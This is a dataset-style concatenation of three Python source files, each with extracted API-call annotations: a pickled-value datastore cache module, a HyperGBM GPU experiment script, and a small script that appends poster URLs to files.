query.filter(cls.expire_time != None) return query.fetch(keys_only=True) def Get(key): """Gets the value from the datastore.""" if key is None: return None namespaced_key = namespaced_stored_object.NamespaceKey(key) entity = ndb.Key('CachedPickledString', namespaced_key).get(read_policy=ndb.EVENTUAL_CONSISTENCY) if entity: return cPickle.loads(entity.value) return stored_object.Get(key) def GetExternal(key): """Gets the value from the datastore for the externally namespaced key.""" if key is None: return None namespaced_key = namespaced_stored_object.NamespaceKey( key, datastore_hooks.EXTERNAL) entity = ndb.Key('CachedPickledString', namespaced_key).get(read_policy=ndb.EVENTUAL_CONSISTENCY) if entity: return cPickle.loads(entity.value) return stored_object.Get(key) def Set(key, value, days_to_keep=None, namespace=None): """Sets the value in the datastore. Args: key: The key name, which will be namespaced. value: The value to set. days_to_keep: Number of days to keep entity in datastore, default is None. Entity will not expire when this value is 0 or None. namespace: Optional namespace, otherwise namespace will be retrieved using datastore_hooks.GetNamespace(). """ # When number of days to keep is given, calculate expiration time for # the entity and store it in datastore. # Once the entity expires, it will be deleted from the datastore. expire_time = None if days_to_keep: expire_time = datetime.datetime.now() + datetime.timedelta( days=days_to_keep) namespaced_key = namespaced_stored_object.NamespaceKey(key, namespace) try: CachedPickledString( id=namespaced_key, value=cPickle.dumps(value), expire_time=expire_time).put() except datastore_errors.BadRequestError as e: logging.warning('BadRequestError for key %s: %s', key, e) except apiproxy_errors.RequestTooLargeError as e: stored_object.Set(key, value) def SetExternal(key, value, days_to_keep=None): """Sets the value in the datastore for the externally namespaced key. Needed for things like /add_point that update internal/external data at the same time. Args: key: The key name, which will be namespaced as externally_visible. value: The value to set. days_to_keep: Number of days to keep entity in datastore, default is None. Entity will not expire when this value is 0 or None. """ Set(key, value, days_to_keep, datastore_hooks.EXTERNAL) @ndb.synctasklet def Delete(key): """Clears the value from the datastore.""" yield DeleteAsync(key) @ndb.tasklet def DeleteAsync(key): unnamespaced_future = stored_object.DeleteAsync(key) # See the comment in stored_object.DeleteAsync() about this get(). entities = yield ndb.get_multi_async([ CachedPickledString.NamespacedKey(key, datastore_hooks.INTERNAL), CachedPickledString.NamespacedKey(key, datastore_hooks.EXTERNAL), ]) keys = [entity.key for entity in entities if entity] yield (unnamespaced_future, ndb.delete_multi_async(keys)) def DeleteAllExpiredEntities(): """Deletes all expired entities from the datastore.""" ndb.delete_multi(CachedPickledString.GetExpiredKeys())
[((49, 10, 49, 28), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((50, 16, 50, 38), 'google.appengine.ext.ndb.DateTimeProperty', 'ndb.DateTimeProperty', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((74, 19, 74, 61), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(74, 57, 74, 60): 'key'}, {}), '(key)', False, 'from dashboard.common import namespaced_stored_object\n'), ((79, 9, 79, 31), 'dashboard.common.stored_object.Get', 'stored_object.Get', ({(79, 27, 79, 30): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((86, 19, 87, 36), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(87, 6, 87, 9): 'key', (87, 11, 87, 35): 'datastore_hooks.EXTERNAL'}, {}), '(key, datastore_hooks.EXTERNAL)', False, 'from dashboard.common import namespaced_stored_object\n'), ((92, 9, 92, 31), 'dashboard.common.stored_object.Get', 'stored_object.Get', ({(92, 27, 92, 30): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((113, 19, 113, 72), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(113, 57, 113, 60): 'key', (113, 62, 113, 71): 'namespace'}, {}), '(key, namespace)', False, 'from dashboard.common import namespaced_stored_object\n'), ((148, 24, 148, 54), 'dashboard.common.stored_object.DeleteAsync', 'stored_object.DeleteAsync', ({(148, 50, 148, 53): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((64, 19, 64, 42), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((78, 11, 78, 38), 'six.moves.cPickle.loads', 'cPickle.loads', ({(78, 25, 78, 37): 'entity.value'}, {}), '(entity.value)', True, 'import six.moves.cPickle as cPickle\n'), ((91, 11, 91, 38), 'six.moves.cPickle.loads', 'cPickle.loads', ({(91, 25, 91, 37): 'entity.value'}, {}), '(entity.value)', True, 'import six.moves.cPickle as cPickle\n'), ((55, 19, 55, 72), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(55, 57, 55, 60): 'key', (55, 62, 55, 71): 'namespace'}, {}), '(key, namespace)', False, 'from dashboard.common import namespaced_stored_object\n'), ((75, 11, 76, 34), 'google.appengine.ext.ndb.Key', 'ndb.Key', ({(75, 19, 75, 40): '"""CachedPickledString"""', (76, 19, 76, 33): 'namespaced_key'}, {}), "('CachedPickledString', namespaced_key)", False, 'from google.appengine.ext import ndb\n'), ((88, 11, 89, 34), 'google.appengine.ext.ndb.Key', 'ndb.Key', ({(88, 19, 88, 40): '"""CachedPickledString"""', (89, 19, 89, 33): 'namespaced_key'}, {}), "('CachedPickledString', namespaced_key)", False, 'from google.appengine.ext import ndb\n'), ((111, 18, 111, 41), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((111, 44, 112, 26), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((120, 4, 120, 61), 'logging.warning', 'logging.warning', ({(120, 20, 120, 52): '"""BadRequestError for key %s: %s"""', (120, 54, 120, 57): 'key', (120, 59, 120, 60): 'e'}, {}), "('BadRequestError for key %s: %s', key, e)", False, 'import logging\n'), ((122, 4, 122, 33), 'dashboard.common.stored_object.Set', 'stored_object.Set', ({(122, 22, 122, 25): 'key', (122, 27, 122, 32): 'value'}, {}), '(key, value)', False, 'from dashboard.common import stored_object\n'), ((155, 30, 155, 58), 'google.appengine.ext.ndb.delete_multi_async', 'ndb.delete_multi_async', ({(155, 53, 155, 57): 'keys'}, {}), '(keys)', False, 'from google.appengine.ext import ndb\n'), ((117, 33, 117, 53), 'six.moves.cPickle.dumps', 'cPickle.dumps', ({(117, 47, 117, 52): 'value'}, {}), '(value)', True, 'import six.moves.cPickle as cPickle\n')]
BigAndSweet/HyperGBM
hypergbm/tests/cuml_/run_experiment_cuml.py
f3bc4e0d877b82a264d35158f9bc974f43a2a5ee
# -*- coding:utf-8 -*- """ """ import cudf from hypergbm import make_experiment from hypernets.tabular import get_tool_box from hypernets.tabular.datasets import dsutils def main(target='y', dtype=None, max_trials=3, drift_detection=False, clear_cache=True, **kwargs): tb = get_tool_box(cudf.DataFrame) assert isinstance(tb, type) and tb.__name__ == 'CumlToolBox' print("preparing...") df = dsutils.load_bank() if dtype is not None: df[target] = df[target].astype(dtype) df, = tb.from_local(df) assert isinstance(df, cudf.DataFrame) df_train, df_test = tb.train_test_split(df, test_size=0.5, random_state=123) X_test = df_test y_test = X_test.pop(target) exp = make_experiment(df_train, target=target, test_data=X_test.copy(), max_trials=max_trials, drift_detection=drift_detection, clear_cache=clear_cache, **kwargs) print('experiment:', f'{[s.name for s in exp.steps]}', 'random_state', exp.random_state) print("training...") estimator = exp.run() print('estimator pipeline:', f'{[s[0] for s in estimator.steps]}') print("scoring...") y_pred = estimator.predict(X_test) y_proba = estimator.predict_proba(X_test) task = exp.task if task == 'regression': metrics = ['mse', 'mae', 'msle', 'rmse', 'r2'] else: metrics = ['auc', 'accuracy', 'f1', 'recall'] result = tb.metrics.calc_score(y_test, y_pred, y_proba, task=task, metrics=metrics, pos_label=kwargs.get('pos_label', None)) print(result) return exp, estimator if __name__ == '__main__': main(target='y', reward_metric='auc', ensemble_size=10, pos_label='yes', log_level='info', max_trials=10) # main(target='y', max_trials=10, cv=False, ensemble_size=0, verbose=0, pos_label='yes', ) # main(target='day', reward_metric='f1', ensemble_size=10, log_level='info', max_trials=5) # main(target='day', dtype='str', reward_metric='f1', ensemble_size=0, log_level='info', max_trials=6) # main(target='age', dtype='float', ensemble_size=10, log_level='info', max_trials=8)
[((14, 9, 14, 37), 'hypernets.tabular.get_tool_box', 'get_tool_box', ({(14, 22, 14, 36): 'cudf.DataFrame'}, {}), '(cudf.DataFrame)', False, 'from hypernets.tabular import get_tool_box\n'), ((18, 9, 18, 28), 'hypernets.tabular.datasets.dsutils.load_bank', 'dsutils.load_bank', ({}, {}), '()', False, 'from hypernets.tabular.datasets import dsutils\n')]
DarthSpector/Poster-Adder
Inserter.py
97a86338987dd8cbcdf56414f53932c0370dcfc2
def pictureInserter(og,address,list): j=0 for i in og: file1 = open(address+'/'+i, "a") x="\ncover::https://image.tmdb.org/t/p/original/"+list[j] file1.writelines(x) file1.close() j=j+1
[]